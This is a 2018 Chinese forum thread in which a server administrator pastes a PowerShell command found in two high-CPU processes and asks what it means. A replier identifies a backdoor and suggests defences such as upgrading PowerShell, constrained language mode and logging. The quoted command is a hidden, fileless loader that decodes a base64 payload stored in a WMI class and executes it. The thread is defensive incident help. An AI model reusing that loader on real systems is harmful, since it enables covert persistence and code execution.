这可能是 powershell 黑客攻击脚本,谁知道是 什么意思?怎么预防?

Tom-Lin 发布于 2018/04/13 21:12
阅读 1K+
收藏 0
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:systemcore_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:systemcore_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

我的 服务器 进程 被杀掉,然后出现了 两个高CPU 的 powershell 进程,发现对应的代码是 上面的 代码。谁知道 怎么 回事?

加载中
0
perfgao
perfgao

很明显你的服务器被入侵了,黑客利用powershell留下了后门

Tom-Lin
Tom-Lin
回复 @perfgao : 非常感谢
perfgao
perfgao
回复 @Tom-Lin : 推荐你看下这篇文章 https://cloud.tencent.com/developer/article/1045757
perfgao
perfgao
@Tom-Lin 回复@Tom-Lin : windows server 2012都这么高版本了?最新的版本不是6.1吗。
Tom-Lin
Tom-Lin
powershell 是windows 2012 自带的,版本是 6.3.9600.16384
perfgao
perfgao
你看下目前使用的powershell版本,版本低于5.0,最好升级到5.0,设置powershell进入受限语言模式,关闭用不到端口,全面杀毒,最好了解下开启powershel模块的记录功能l
0
Tom-Lin
Tom-Lin

我 3月10日 重装了系统,又被黑了。你有什么 办法吗?

0
Tom-Lin
Tom-Lin

这可能吗?

perfgao
perfgao
powershell是windows内置的
返回顶部
顶部